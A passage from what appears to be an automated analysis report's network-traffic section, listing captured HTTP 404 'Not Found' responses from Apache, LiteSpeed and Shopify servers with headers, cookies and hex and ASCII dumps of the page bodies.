22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:27:36 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:27:39 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Dec 2023 14:27:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Dec 2023 14:28:01 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Dec 2023 14:28:03 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Mon, 04 Dec 2023 14:28:06 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:28:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:12 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:12 GMT; SameSite=LaxSet-Cookie: _shopify_y=7e9a8744-5900-4053-b9f4-3d92c1cb1401; Expires=Tue, 03-Dec-24 14:28:12 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=848dc933-1a65-49de-9c6f-80044a2f9b06; Expires=Mon, 04-Dec-23 14:58:12 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=189X-Shopify-Stage: productionContent-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=18b0d218-e0c6-421Data Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:28:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:14 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:14 GMT; SameSite=LaxSet-Cookie: _shopify_y=02be2310-1102-43bf-bbf2-013301af3494; Expires=Tue, 03-Dec-24 14:28:14 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=031fab2f-5531-432f-acdb-c3e393998f7a; Expires=Mon, 04-Dec-23 14:58:14 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=121X-Shopify-Stage: productionContent-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9b7230b8-28ec-4cfData Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:28:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:17 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:17 GMT; SameSite=LaxSet-Cookie: _shopify_y=2e4bd00b-11d3-4efc-9730-41f05ece12d0; Expires=Tue, 03-Dec-24 14:28:17 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=219adf6f-de36-4280-bfaa-386c2d51f9ae; Expires=Mon, 04-Dec-23 14:58:17 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=161X-Shopify-Stage: productionContent-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=031c8eb7-0c56-477Data Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:28:39 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:28:42 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:28:44 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 